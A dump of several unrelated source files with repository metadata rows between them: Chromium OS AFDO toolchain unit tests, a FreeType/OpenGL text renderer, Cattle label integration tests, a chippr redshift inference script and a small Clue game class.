self.mock_get = self.PatchObject(
toolchain_util,
'_GetArtifactVersionInEbuild',
return_value=self.artifact)
self.mock_exist = self.PatchObject(
gs.GSContext, 'Exists', return_value=False)
self.mock_upload = self.PatchObject(gs.GSContext, 'Copy')
def testWrongArtifactType(self):
"""Test wrong artifact_type raises exception."""
with self.assertRaises(ValueError) as context:
toolchain_util._UploadVettedAFDOArtifacts('wrong-type')
self.assertEqual('Only orderfile and kernel_afdo are supported.',
str(context.exception))
self.mock_exist.assert_not_called()
self.mock_upload.assert_not_called()
def testArtifactExistInGSBucket(self):
"""Test the artifact is already in the GS bucket."""
mock_exist = self.PatchObject(gs.GSContext, 'Exists', return_value=True)
ret = toolchain_util._UploadVettedAFDOArtifacts('orderfile')
mock_exist.assert_called_once()
self.assertIsNone(ret)
def testUploadVettedOrderfile(self):
"""Test _UploadVettedAFDOArtifacts() works with orderfile."""
full_name = self.artifact + toolchain_util.XZ_COMPRESSION_SUFFIX
source_url = os.path.join(toolchain_util.ORDERFILE_GS_URL_UNVETTED,
full_name)
dest_url = os.path.join(toolchain_util.ORDERFILE_GS_URL_VETTED, full_name)
ret = toolchain_util._UploadVettedAFDOArtifacts('orderfile')
self.mock_get.assert_called_once_with('chromeos-chrome',
'UNVETTED_ORDERFILE')
self.mock_exist.assert_called_once_with(dest_url)
self.mock_upload.assert_called_once_with(
source_url, dest_url, acl='public-read')
self.assertEqual(ret, self.artifact)
def testUploadVettedKernelAFDO(self):
"""Test _UploadVettedAFDOArtifacts() works with kernel afdo."""
full_name = self.artifact + toolchain_util.KERNEL_AFDO_COMPRESSION_SUFFIX
source_url = os.path.join(toolchain_util.KERNEL_PROFILE_URL, self.kver,
full_name)
dest_url = os.path.join(toolchain_util.KERNEL_AFDO_GS_URL_VETTED, self.kver,
full_name)
ret = toolchain_util._UploadVettedAFDOArtifacts('kernel_afdo', self.kver)
self.mock_get.assert_called_once_with(
'chromeos-kernel-' + self.kver.replace('.', '_'),
'AFDO_PROFILE_VERSION')
self.mock_exist.assert_called_once_with(dest_url)
self.mock_upload.assert_called_once_with(
source_url, dest_url, acl='public-read')
self.assertEqual(ret, self.artifact)
class PublishVettedAFDOArtifactTest(cros_test_lib.MockTempDirTestCase):
"""Test _PublishVettedAFDOArtifacts()."""
# pylint: disable=protected-access
def setUp(self):
self.package = 'silvermont'
self.package2 = 'benchmark'
self.afdo_sorted_by_freshness = [
'R78-3865.0-1560000000.afdo', 'R78-3869.38-1562580965.afdo',
'R78-3866.0-1570000000.afdo'
]
self.uploaded_invalid = {
self.package: self.afdo_sorted_by_freshness[0],
self.package2: None
}
self.uploaded = {
self.package: self.afdo_sorted_by_freshness[2],
self.package2: None
}
# Prepare a JSON file containing metadata
toolchain_util.TOOLCHAIN_UTILS_PATH = self.tempdir
osutils.SafeMakedirs(os.path.join(self.tempdir, 'afdo_metadata'))
self.json_file = os.path.join(self.tempdir,
'afdo_metadata/kernel_afdo.json')
self.afdo_versions = {
self.package: {
'name': self.afdo_sorted_by_freshness[1],
},
self.package2: {
'name': 'R1234',
},
'some-package-should-not-change': {
'name': 'R5678-1234',
},
}
with open(self.json_file, 'w') as f:
json.dump(self.afdo_versions, f)
GitStatus = collections.namedtuple('GitStatus', ['output'])
self.mock_git = self.PatchObject(
git, 'RunGit', return_value=GitStatus(output='non-empty'))
def testPublishOlderArtifactThanInMetadataFailure(self):
"""Test failure when publishing an older metadata as than JSON file."""
with self.assertRaises(
toolchain_util.PublishVettedAFDOArtifactsError) as context:
toolchain_util._PublishVettedAFDOArtifacts(self.json_file,
self.uploaded_invalid)
self.assertIn('to update is not newer than the JSON file',
str(context.exception))
def testPublishUploadedProfilesPass(self):
"""Test successfully publish metadata for uploaded profiles."""
toolchain_util._PublishVettedAFDOArtifacts(self.json_file, self.uploaded)
# Check changes in JSON file
new_afdo_versions = json.loads(osutils.ReadFile(self.json_file))
self.assertEqual(len(self.afdo_versions), len(new_afdo_versions))
self.assertEqual(new_afdo_versions[self.package]['name'],
self.uploaded[self.package])
for k in self.afdo_versions:
# Make sure other fields are not changed
if k != self.package:
self.assertEqual(self.afdo_versions[k], new_afdo_versions[k])
# Check the git calls correct
message = 'afdo_metadata: Publish new profiles.\n\n'
message += 'Update %s from %s to %s\n' % (self.package,
self.afdo_sorted_by_freshness[1],
self.afdo_sorted_by_freshness[2])
calls = [
mock.call(
self.tempdir, [
'pull',
toolchain_util.TOOLCHAIN_UTILS_REPO,
'refs/heads/master',
],
print_cmd=True),
mock.call(
self.tempdir, ['status', '--porcelain', '-uno'],
capture_output=True,
print_cmd=True),
mock.call(self.tempdir, ['diff'], capture_output=True, print_cmd=True),
mock.call(
self.tempdir, ['commit', '-a', '-m', message], print_cmd=True),
mock.call(
self.tempdir, [
'push', toolchain_util.TOOLCHAIN_UTILS_REPO,
'HEAD:refs/for/master%submit'
],
capture_output=True,
print_cmd=True)
]
self.mock_git.assert_has_calls(calls)
class UploadReleaseChromeAFDOTest(cros_test_lib.MockTempDirTestCase):
"""Test _UploadReleaseChromeAFDO() and related functions."""
# pylint: disable=protected-access
def setUp(self):
self.cwp_name = 'R77-3809.38-1562580965.afdo'
self.cwp_full = self.cwp_name + toolchain_util.XZ_COMPRESSION_SUFFIX
self.arch = 'silvermont'
self.benchmark_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
self.benchmark_full = \
self.benchmark_name + toolchain_util.BZ2_COMPRESSION_SUFFIX
cwp_string = '%s-77-3809.38-1562580965' % self.arch
benchmark_string = 'benchmark-77.0.3849.0-r1'
self.merged_name = 'chromeos-chrome-amd64-%s-%s' % (cwp_string,
benchmark_string)
self.redacted_name = self.merged_name + '-redacted.afdo'
self.output = os.path.join(
self.tempdir, self.redacted_name + toolchain_util.XZ_COMPRESSION_SUFFIX)
self.decompress = self.PatchObject(cros_build_lib, 'UncompressFile')
self.compress = self.PatchObject(
toolchain_util, '_CompressAFDOFiles', return_value=[self.output])
self.upload = self.PatchObject(toolchain_util,
'_UploadAFDOArtifactToGSBucket')
self.run_command = self.PatchObject(cros_build_lib, 'run')
self.gs_copy = self.PatchObject(gs.GSContext, 'Copy')
self.PatchObject(osutils.TempDir, '__enter__', return_value=self.tempdir)
@mock.patch.object(builtins, 'open')
def testRedactAFDOProfile(self, mock_open):
"""Test _RedactAFDOProfile() handles calls correctly."""
input_name = os.path.join(self.tempdir, self.merged_name)
input_to_text = input_name + '.text.temp'
redacted_temp = input_name + '.redacted.temp'
removed_temp = input_name + '.removed.temp'
output_name = os.path.join(self.tempdir, self.redacted_name)
mock_file_obj = io.StringIO()
mock_open.return_value = mock_file_obj
toolchain_util._RedactAFDOProfile(input_name, output_name)
redact_calls = [
mock.call(
[
'llvm-profdata',
'merge',
'-sample',
'-text',
input_name,
'-output',
input_to_text,
],
enter_chroot=True,
print_cmd=True,
),
mock.call(
['redact_textual_afdo_profile'],
input=mock_file_obj,
stdout=redacted_temp,
print_cmd=True,
enter_chroot=True,
),
mock.call(
[
'remove_indirect_calls',
'--input=' + redacted_temp,
'--output=' + removed_temp,
],
enter_chroot=True,
print_cmd=True,
),
mock.call(
[
'llvm-profdata',
'merge',
'-sample',
'-compbinary',
removed_temp,
'-output',
output_name,
],
enter_chroot=True,
print_cmd=True,
)
]
self.run_command.assert_has_calls(redact_calls)
def testCreateReleaseChromeAFDOPass(self):
"""Test _CreateReleaseChromeAFDO() handles naming and calls correctly."""
redact_call = self.PatchObject(toolchain_util, '_RedactAFDOProfile')
toolchain_util._CreateReleaseChromeAFDO(self.cwp_name, self.arch,
self.benchmark_name, self.tempdir)
# Check downloading files.
gs_copy_calls = [
mock.call(
os.path.join(toolchain_util.CWP_AFDO_GS_URL, self.arch,
self.cwp_full),
os.path.join(self.tempdir, self.cwp_full)),
mock.call(
os.path.join(toolchain_util.BENCHMARK_AFDO_GS_URL,
self.benchmark_full),
os.path.join(self.tempdir, self.benchmark_full))
]
self.gs_copy.assert_has_calls(gs_copy_calls)
# Check decompress files.
decompress_calls = [
mock.call(
os.path.join(self.tempdir, self.cwp_full),
os.path.join(self.tempdir, self.cwp_name)),
mock.call(
os.path.join(self.tempdir, self.benchmark_full),
os.path.join(self.tempdir, self.benchmark_name))
]
self.decompress.assert_has_calls(decompress_calls)
# Check call to merge.
merge_command = [
'llvm-profdata',
'merge',
'-sample',
'-output=' + os.path.join(self.tempdir, self.merged_name),
'-weighted-input=%d,%s' % (toolchain_util.RELEASE_CWP_MERGE_WEIGHT,
os.path.join(self.tempdir, self.cwp_name)),
'-weighted-input=%d,%s' %
(toolchain_util.RELEASE_BENCHMARK_MERGE_WEIGHT,
os.path.join(self.tempdir, self.benchmark_name)),
]
self.run_command.assert_called_once_with(
merge_command, enter_chroot=True, print_cmd=True)
# Check calls to redact.
redact_call.assert_called_once_with(
os.path.join(self.tempdir, self.merged_name),
os.path.join(self.tempdir, self.redacted_name))
def testUploadReleaseChromeAFDOPass(self):
"""Test _UploadReleaseChromeAFDO() handles naming and calls correctly."""
verified_afdo = os.path.join(self.tempdir, self.redacted_name)
self.PatchObject(
toolchain_util,
'_GetArtifactVersionInEbuild',
return_value=verified_afdo)
ret = toolchain_util._UploadReleaseChromeAFDO()
self.assertEqual(verified_afdo, ret)
# Check compress and upload.
self.compress.assert_called_once_with([os.path.join(verified_afdo)], None,
self.tempdir,
toolchain_util.XZ_COMPRESSION_SUFFIX)
self.upload.assert_called_once_with(
toolchain_util.RELEASE_AFDO_GS_URL_VETTED,
os.path.join(self.tempdir,
self.redacted_name + toolchain_util.XZ_COMPRESSION_SUFFIX))
class UploadAndPublishVettedAFDOArtifactsTest(
    cros_test_lib.MockTempDirTestCase):
"""Test UploadAndPublishVettedAFDOArtifacts()."""
orderfile_name = 'chrome.orderfile'
kernel_afdo = 'kernel.afdo'
@staticmethod
def mockUploadVettedAFDOArtifacts(artifact_type, _subcategory=None):
if artifact_type == 'orderfile':
return UploadAndPublishVettedAFDOArtifactsTest.orderfile_name
if artifact_type == 'kernel_afdo':
return UploadAndPublishVettedAFDOArtifactsTest.kernel_afdo
return None
def setUp(self):
self.mock_upload = self.PatchObject(
toolchain_util,
'_UploadVettedAFDOArtifacts',
side_effect=self.mockUploadVettedAFDOArtifacts)
self.mock_publish = self.PatchObject(toolchain_util,
'_PublishVettedAFDOArtifacts')
self.mock_merge = self.PatchObject(toolchain_util,
'_UploadReleaseChromeAFDO')
    self.board = 'chell'  # chell chosen to test the kernel AFDO path
self.kver = '3.18'
self.kernel_json = os.path.join(toolchain_util.TOOLCHAIN_UTILS_PATH,
'afdo_metadata/kernel_afdo.json')
self.chrome_json = os.path.join(toolchain_util.TOOLCHAIN_UTILS_PATH,
'afdo_metadata/chrome_afdo.json')
def testReturnFalseWhenNoArtifactUploaded(self):
"""Test it returns False when no new artifacts are uploaded."""
mock_upload_nothing = self.PatchObject(
toolchain_util, '_UploadVettedAFDOArtifacts', return_value=None)
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'orderfile', self.board)
self.assertFalse(ret)
mock_upload_nothing.assert_called_once_with('orderfile')
self.mock_publish.assert_not_called()
def testChromeAFDOPass(self):
"""Make sure for chrome_afdo, it calls other functions correctly."""
mock_upload = self.PatchObject(toolchain_util, '_UploadReleaseChromeAFDO')
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'chrome_afdo', self.board)
self.assertTrue(ret)
mock_upload.assert_called_once_with()
self.mock_publish.assert_not_called()
def testKernelAFDOPass(self):
"""Make sure for kernel_afdo, it calls other functions correctly."""
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'kernel_afdo', self.board)
self.assertTrue(ret)
uploaded = {
'chromeos-kernel-' + self.kver.replace('.', '_'): self.kernel_afdo
}
self.mock_upload.assert_called_once_with('kernel_afdo', self.kver)
self.mock_publish.assert_called_once_with(
self.kernel_json, uploaded,
'afdo_metadata: Publish new profiles for kernel %s.' % self.kver)
def testOrderfilePass(self):
"""Make sure for orderfile, it calls other functions correctly."""
ret = toolchain_util.UploadAndPublishVettedAFDOArtifacts(
'orderfile', self.board)
self.assertTrue(ret)
self.mock_upload.assert_called_once_with('orderfile')
self.mock_publish.assert_not_called()
|
bsd-3-clause
| 5,497,388,569,140,276,000 | 39.911888 | 80 | 0.656115 | false |
explosiveduck/ed2d
|
ed2d/text.py
|
1
|
8327
|
import ctypes as ct
import freetype.raw as ft
from ed2d import texture
from ed2d import mesh
from ed2d import typeutils
from ed2d.opengl import gl, pgl
# from ed2d import glmath as cyglmath
# from ed2d.glmath import cython as cyglmath
from gem import matrix, vector
# Hack to ensure that freetype is properly destructed after everything else;
# this code was also committed to freetype-py
class _FT_Library_Wrapper(ft.FT_Library):
'''Subclass of FT_Library to help with calling FT_Done_FreeType'''
# for some reason this doesn't get carried over and ctypes complains
_type_ = ft.FT_Library._type_
# Store ref to FT_Done_FreeType otherwise it will be deleted before needed.
_ft_done_freetype = ft.FT_Done_FreeType
def __del__(self):
# call FT_Done_FreeType
self._ft_done_freetype(self)
def init_freetype():
handle = _FT_Library_Wrapper()
if ft.FT_Init_FreeType(ct.byref(handle)):
raise Exception('FreeType failed to initialize.')
return handle
freetype = init_freetype()
# These are the usable fields of FT_GlyphSlotRec
# field: data type:
# library FT_Library
# face FT_Face
# next FT_GlyphSlot
# generic FT_Generic
# metrics FT_Glyph_Metrics
# linearHoriAdvance FT_Fixed
# linearVertAdvance FT_Fixed
# advance FT_Vector
# format FT_Glyph_Format
# bitmap FT_Bitmap
# bitmap_left FT_Int
# bitmap_top FT_Int
# outline FT_Outline
# num_subglyphs FT_UInt
# subglyphs FT_SubGlyph
# control_data void*
# control_len long
# lsb_delta FT_Pos
# rsb_delta FT_Pos
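# (face.contents.glyph yields a ctypes pointer to this struct, so the fields
# above are reached through .contents, as in Font.load_glyph below.)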
class Font(object):
def __init__(self, size, fontPath):
self.size = size
self.path = fontPath
self.face = ft.FT_Face()
        # Cache of per-character glyph data dicts, keyed by character.
        # Each entry holds the keys 'pixelData', 'bitmap_x', 'bitmap_y',
        # 'texWidth', 'texHeight' and 'advance' (see load_glyph below).
self.charDataCache = {}
# load font face
if ft.FT_New_Face(freetype, typeutils.to_c_str(fontPath), 0,
ct.byref(self.face)):
raise Exception('Error loading font.')
# For now the device dpi will be hard coded to 72
# later on if we want to do mobile stuff, or have dpi scaling
# for high-dpi monitors this will need to be changed.
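        # FT_Set_Char_Size takes the character size in 26.6 fixed-point
        # units (1/64th of a point), hence the size * 64 below.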
if ft.FT_Set_Char_Size(self.face, 0, size * 64, 72, 72):
raise Exception('Error setting character size.')
def load_glyph(self, char):
'''
Loads glyph, and returns a dictionary containing glyph data.
'''
try:
return self.charDataCache[char]
except KeyError:
index = ft.FT_Get_Char_Index(self.face, ord(char))
if ft.FT_Load_Glyph(self.face, index, ft.FT_LOAD_RENDER):
raise Exception('Error loading glyph')
glyphSlot = self.face.contents.glyph
charData = {}
bitmapStruct = glyphSlot.contents.bitmap
texWidth = bitmapStruct.width
texHeight = bitmapStruct.rows
pixelData = [0.0 for x in range(texWidth * texHeight)]
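            # Copy the glyph bitmap out of the ctypes buffer into a plain
            # Python list; FT_LOAD_RENDER produces one grayscale byte per
            # pixel.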
for item in range(texWidth * texHeight):
pixelData[item] = bitmapStruct.buffer[item]
if not pixelData:
pixelData = [0]
charData['pixelData'] = pixelData
charData['bitmap_x'] = glyphSlot.contents.bitmap_left
charData['bitmap_y'] = glyphSlot.contents.bitmap_top
charData['texWidth'] = texWidth
charData['texHeight'] = texHeight
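            # advance.x is in 26.6 fixed-point units; shifting right by 6
            # converts it to whole pixels.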
charData['advance'] = glyphSlot.contents.advance.x >> 6
self.charDataCache[char] = charData
return charData
def delete(self):
'''Delete the freetype face'''
ft.FT_Done_Face(self.face)
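# A minimal usage sketch for Font (the font path and size are hypothetical;
# this is not part of the original module):
#
#   font = Font(16, '/usr/share/fonts/DejaVuSans.ttf')
#   glyph = font.load_glyph('A')
#   glyph['texWidth'], glyph['texHeight']  # bitmap size in pixels
#   glyph['advance']                       # horizontal pen advance in pixels
#   font.delete()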
class Text(object):
def __init__(self, program, font):
self.program = program
self.texAtlas = texture.TextureAtlas(self.program, texFormat=gl.GL_RED)
self.font = font
self.vertLoc = self.program.get_attribute(b'position')
self.UVLoc = self.program.get_attribute(b'vertexUV')
        self.data = [[0.0, 1.0], [1.0, 1.0], [0.0, 0.0], [1.0, 0.0]]
self.chrMap = {}
self.basePos = 0.0
self.lineSpacing = 3
for texVal in range(32, 128):
char = chr(texVal)
fontData = self.font.load_glyph(char)
            # Find the farthest position from the baseline
if fontData['bitmap_y'] > self.basePos:
self.basePos = fontData['bitmap_y']
self.chrMap[char] = Glyph(self.program, self.texAtlas, fontData,
char, self)
print(self.basePos)
self.texAtlas.gen_atlas()
self.vbo = mesh.buffer_object(self.data, gl.GLfloat)
for glyph in self.chrMap.values():
glyph.init_gl()
def draw_text(self, text, xPos, yPos):
self.program.use()
self.texAtlas.bind()
        # Once textures can be added to an Atlas dynamically, this is where
        # the glyph objects will be created, instead of generating all of
        # the printable ASCII characters up front in __init__.
textLines = text.split('\n')
penPosX = xPos
penPosY = self.basePos + yPos
for txt in textLines:
for c in txt:
char = self.chrMap[c]
char.render(penPosX, penPosY)
penPosX += char.advance
penPosY += self.basePos + self.lineSpacing
penPosX = xPos
# gl.glDisableVertexAttribArray(self.UVLoc)
# gl.glDisableVertexAttribArray(self.vertLoc)
# gl.glBindBuffer(gl.GL_ARRAY_BUFFER, 0)
gl.glBindVertexArray(0)
class Glyph(object):
def __init__(self, program, atlas, fontData, char, parent):
self.atlas = atlas
self.fontData = fontData
self.program = program
self.parent = parent
self.nverts = 4
self.vertLoc = self.program.get_attribute(b'position')
self.modelLoc = self.program.new_uniform(b'model')
self.UVLoc = self.program.get_attribute(b'vertexUV')
self.modelMatrix = matrix.Matrix(4)
self.char = char
self.pixelData = self.fontData['pixelData']
self.textureWidth = self.fontData['texWidth']
self.textureHeight = self.fontData['texHeight']
self.bitX = self.fontData['bitmap_x']
self.bitY = self.fontData['bitmap_y']
self.advance = self.fontData['advance']
self.uniform = self.program.get_uniform(self.modelLoc)
self.textureID = self.atlas.add_texture(self.textureWidth,
self.textureHeight,
self.pixelData)
def init_gl(self):
self.vao = pgl.glGenVertexArrays(1)
gl.glBindVertexArray(self.vao)
self._uvCoords = self.atlas.get_uvcoords(self.textureID)
self.vertexScale = self.atlas.get_vertex_scale(self.textureID)
vecScale = vector.Vector(
3,
data=[self.atlas.maxSubTextureHeight * self.vertexScale[0],
self.atlas.maxSubTextureHeight * self.vertexScale[1], 0.0])
self.scaleMat = matrix.Matrix(4).i_scale(vecScale)
self.uvbo = mesh.buffer_object(self._uvCoords, gl.GLfloat)
gl.glEnableVertexAttribArray(self.vertLoc)
gl.glEnableVertexAttribArray(self.UVLoc)
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.parent.vbo)
pgl.glVertexAttribPointer(self.vertLoc, 2, gl.GL_FLOAT, gl.GL_FALSE, 0, None)
gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.uvbo)
pgl.glVertexAttribPointer(self.UVLoc, 2, gl.GL_FLOAT, gl.GL_FALSE, 0, None)
gl.glBindVertexArray(0)
def render(self, posX, posY):
gl.glBindVertexArray(self.vao)
vecScale = vector.Vector(
3,
data=[posX + self.bitX, posY - self.bitY, 0.0])
self.modelMatrix = self.scaleMat.translate(vecScale)
self.program.set_uniform_matrix(self.modelLoc, self.modelMatrix,
uniform=self.uniform,
size=4)
gl.glDrawArrays(gl.GL_TRIANGLE_STRIP, 0, self.nverts)
|
bsd-2-clause
| -91,192,763,042,211,230 | 29.95539 | 85 | 0.594332 | false |
yasker/cattle
|
tests/integration/cattletest/core/test_label.py
|
1
|
3780
|
from common_fixtures import * # NOQA
def _clean_hostlabelmaps_for_host(client, host):
for label in host.labels():
host.removelabel(label=label.id)
wait_for_condition(
client, host,
lambda x: len(x.labels()) == 0,
        lambda x: 'Number of labels for host is: ' + str(len(x.labels())))
def test_add_remove_host_label(super_client, sim_context):
host = sim_context['host']
_clean_hostlabelmaps_for_host(super_client, host)
host.addlabel(key='location', value='basement')
assert host.labels()[0].key == 'location'\
and host.labels()[0].value == 'basement'
# make sure duplicate entry is not made
host.addlabel(key='location', value='basement')
assert len(host.labels()) == 1
host.addlabel(key='color', value='blue')
assert len(host.labels()) == 2
_clean_hostlabelmaps_for_host(super_client, host)
assert len(host.labels()) == 0
def test_add_remove_container_label(admin_client, sim_context):
host = sim_context['host']
image_uuid = sim_context['imageUuid']
c = admin_client.create_container(imageUuid=image_uuid,
requestedHostId=host.id)
c.addlabel(key='func', value='web')
assert c.instanceLabels()[0].key == 'func' \
and c.instanceLabels()[0].value == 'web'
# make sure duplicate entry is not made
c.addlabel(key='func', value='web')
assert len(c.instanceLabels()) == 1
c.addlabel(key='nom', value='son')
assert len(c.instanceLabels()) == 2
c.removelabel(label=c.instanceLabels()[1].id)
c.removelabel(label=c.instanceLabels()[0].id)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 0,
        lambda x: 'Number of labels for container is: ' +
        str(len(x.instanceLabels())))
def test_set_container_labels(admin_client, sim_context):
host = sim_context['host']
image_uuid = sim_context['imageUuid']
c = admin_client.create_container(imageUuid=image_uuid,
requestedHostId=host.id)
labels = {'role': 'web',
'size': '4'}
c.setlabels(labels=labels)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 2,
lambda x: 'Number of labels for container is: ' +
        str(len(x.instanceLabels())))
_assert_labels(c.instanceLabels(), labels)
new_labels = {'role': 'web+db',
'nom': 'foobar'}
c.setlabels(labels=new_labels)
wait_for_condition(
admin_client, c,
lambda x: len(x.instanceLabels()) == 2,
lambda x: 'Number of labels for container is: ' +
        str(len(x.instanceLabels())))
_assert_labels(c.instanceLabels(), new_labels)
def test_set_host_labels(super_client, sim_context):
host = sim_context['host']
_clean_hostlabelmaps_for_host(super_client, host)
labels = {'location': 'closet',
'cpus': '4'}
host.setlabels(labels=labels)
wait_for_condition(
super_client, host,
lambda x: len(x.labels()) == 2,
        lambda x: 'Number of labels for host is: ' + str(len(x.labels())))
_assert_labels(host.labels(), labels)
new_labels = {'location': 'attic',
'memory': '16gb'}
host.setlabels(labels=new_labels)
wait_for_condition(
super_client, host,
lambda x: len(x.labels()) == 2,
        lambda x: 'Number of labels for host is: ' + str(len(x.labels())))
_assert_labels(host.labels(), new_labels)
def _assert_labels(labels_list, checking_for_labels):
labels_map = {}
for label in labels_list:
labels_map[label.key] = label.value
for k, v in checking_for_labels.items():
assert labels_map.get(k) is not None and labels_map.get(k) == v
|
apache-2.0
| -5,746,245,027,994,667,000 | 30.239669 | 74 | 0.60291 | false |
aimalz/chippr
|
research/scripts/multi_inf_script.py
|
1
|
5585
|
def check_prob_params(params):
"""
Sets parameter values pertaining to components of probability
Parameters
----------
params: dict
dictionary containing key/value pairs for probability
Returns
-------
params: dict
dictionary containing key/value pairs for probability
"""
if 'prior_mean' not in params:
params['prior_mean'] = 'interim'
else:
params['prior_mean'] = params['prior_mean'][0]
if 'no_prior' not in params:
params['no_prior'] = 0
else:
params['no_prior'] = int(params['no_prior'][0])
if 'no_data' not in params:
params['no_data'] = 0
else:
params['no_data'] = int(params['no_data'][0])
return params
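# Illustration of the defaults check_prob_params applies (hypothetical input;
# not part of the original script):
#
#   check_prob_params({'prior_mean': ['sample']})
#   # -> {'prior_mean': 'sample', 'no_prior': 0, 'no_data': 0}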
def set_up_prior(data, params):
"""
Function to create prior distribution from data
Parameters
----------
data: dict
catalog dictionary containing bin endpoints, log interim prior, and log
interim posteriors
params: dict
dictionary of parameter values for creation of prior
Returns
-------
prior: chippr.mvn object
prior distribution as multivariate normal
"""
zs = data['bin_ends']
log_nz_intp = data['log_interim_prior']
log_z_posts = data['log_interim_posteriors']
z_difs = zs[1:]-zs[:-1]
z_mids = (zs[1:]+zs[:-1])/2.
n_bins = len(z_mids)
n_pdfs = len(log_z_posts)
    a = 1.  # / n_bins
    b = 3.  # 1. / z_difs ** 2
    c = 3.e-2  # a / n_pdfs
prior_var = np.eye(n_bins)
for k in range(n_bins):
prior_var[k] = a * np.exp(-0.5 * b * (z_mids[k] - z_mids) ** 2)
prior_var += c * np.identity(n_bins)
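    # The covariance built above is a squared-exponential kernel plus
    # diagonal jitter: prior_var[j, k] = a * exp(-b / 2 * (z_j - z_k)**2)
    # + c * delta_jk.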
prior_mean = log_nz_intp
prior = mvn(prior_mean, prior_var)
if params['prior_mean'] == 'sample':
new_mean = prior.sample_one()
prior = mvn(new_mean, prior_var)
print(params['prior_mean'], prior_mean, new_mean)
else:
print(params['prior_mean'], prior_mean)
return (prior, prior_var)
def do_inference(given_key):
"""
Function to do inference from a catalog of photo-z interim posteriors
Parameters
----------
given_key: string
name of test case to be run
Notes
-----
TODO: enable continuation of sampling starting from samples in a file
"""
test_info = all_tests[given_key]
test_name = test_info['name']
test_name = test_name[:-1]
param_file_name = test_name + '.txt'
params = chippr.utils.ingest(param_file_name)
params = check_prob_params(params)
params = defaults.check_inf_params(params)
print(params)
test_dir = os.path.join(result_dir, test_name)
simulated_posteriors = catalog(params=param_file_name, loc=test_dir, prepend=test_name)
saved_location = 'data'
saved_type = '.txt'
data = simulated_posteriors.read(loc=saved_location, style=saved_type)
zs = data['bin_ends']
z_difs = zs[1:]-zs[:-1]
with open(os.path.join(os.path.join(test_dir, saved_location), 'true_vals.txt'), 'r') as true_file:
true_data = csv.reader(true_file, delimiter=' ')
true_vals = []
for z in true_data:
true_vals.append(float(z[0]))
true_vals = np.array(true_vals)
true_vals = np.histogram(true_vals, bins=zs, density=True)[0]
true_nz = chippr.discrete(zs, true_vals)
(prior, cov) = set_up_prior(data, params)
nz = log_z_dens(data, prior, truth=true_nz, loc=test_dir, prepend=test_name, vb=True)
nz_stacked = nz.calculate_stacked()
# print('stacked: '+str(np.dot(np.exp(nz_stacked), z_difs)))
nz_mmap = nz.calculate_mmap()
# print('MMAP: '+str(np.dot(np.exp(nz_mmap), z_difs)))
# nz_mexp = nz.calculate_mexp()
# print('MExp: '+str(np.dot(np.exp(nz_mexp), z_difs)))
start_mmle = timeit.default_timer()
nz_mmle = nz.calculate_mmle(nz_stacked, no_data=params['no_data'], no_prior=params['no_prior'])
end_mmle = timeit.default_timer()-start_mmle
print('MMLE: '+str(np.dot(np.exp(nz_mmle), z_difs))+' in '+str(end_mmle))
nz_stats = nz.compare()
nz.plot_estimators(log=True, mini=False)
nz.plot_estimators(log=False, mini=False)
nz.write('nz.p')
# COMMENT OUT TO AVOID SAMPLING
    # start_mean = mvn(nz_mmle, cov).sample_one()
    start = prior  # mvn(data['log_interim_prior'], cov)
n_bins = len(zs) - 1
if params['n_walkers'] is not None:
n_ivals = params['n_walkers']
else:
n_ivals = 10 * n_bins
initial_values = start.sample(n_ivals)
start_samps = timeit.default_timer()
nz_samps = nz.calculate_samples(initial_values, no_data=params['no_data'], no_prior=params['no_prior'], n_procs=1, gr_threshold=params['gr_threshold'])
time_samps = timeit.default_timer()-start_samps
print(test_name+' sampled '+str(params['n_accepted'])+' after '+str(nz.burn_ins * params['n_burned'])+' in '+str(time_samps))
nz_stats = nz.compare()
nz.plot_estimators(log=True, mini=False)
nz.plot_estimators(log=False, mini=False)
nz.write('nz.p')
if __name__ == "__main__":
import numpy as np
import pickle
import os
import multiprocessing as mp
import chippr
from chippr import *
result_dir = os.path.join('..', 'results')
name_file = 'which_inf_tests.txt'
with open(name_file) as tests_to_run:
all_tests = {}
for test_name in tests_to_run:
test_info = {}
test_info['name'] = test_name
all_tests[test_name] = test_info
nps = mp.cpu_count()
pool = mp.Pool(nps)
pool.map(do_inference, all_tests.keys())
|
mit
| -2,699,593,026,303,623,700 | 30.201117 | 155 | 0.604118 | false |
BrandonYates/sherlock
|
Python/Clue/Player.py
|
1
|
1585
|
#!/usr/bin/python
class Player:
#just a string identifier
_name = None
#array of card objects given at game init
_cards = None
#player objects created at game init
_opponents = None
#map of cards associated with each opponent
    #opponents is like a set of keys
#_knowledge.get(_opponents[0]) returns the knowledge
# for the zeroth opponent
_knowledge = {}
def __init__(self, name):
self._name = name
def getName(self):
        return self._name
def getCards(self):
return self._cards
def getOpponents(self):
return self._opponents
def setCards(self, cards):
self._cards = cards
def setOpponents(self, opponents):
self._opponents = opponents
class PlayerKnowledge:
_playerName = None
_cardKnowledge = {}
def __init__(self, name):
self._playerName = name
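        # CharacterName, WeaponName and RoomName are assumed to be provided
        # by the surrounding package; the original file does not import them.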
characterNames = CharacterName.getNames()
weaponNames = WeaponName.getNames()
roomNames = RoomName.getNames()
        for name in characterNames:
            self._cardKnowledge[name] = False
        for name in weaponNames:
            self._cardKnowledge[name] = False
        for name in roomNames:
            self._cardKnowledge[name] = False
def updateKnowledge(self, key, value):
self._cardKnowledge.update({key: value})
def getPlayerName(self):
        return self._playerName
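# A minimal usage sketch (hypothetical names; not part of the original file):
#
#   alice = Player('Alice')
#   bob = Player('Bob')
#   alice.setOpponents([bob])
#   knowledge = PlayerKnowledge('Alice')
#   knowledge.updateKnowledge('Miss Scarlet', True)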
|
gpl-3.0
| 7,106,148,268,937,828,000 | 23.015152 | 56 | 0.599369 | false |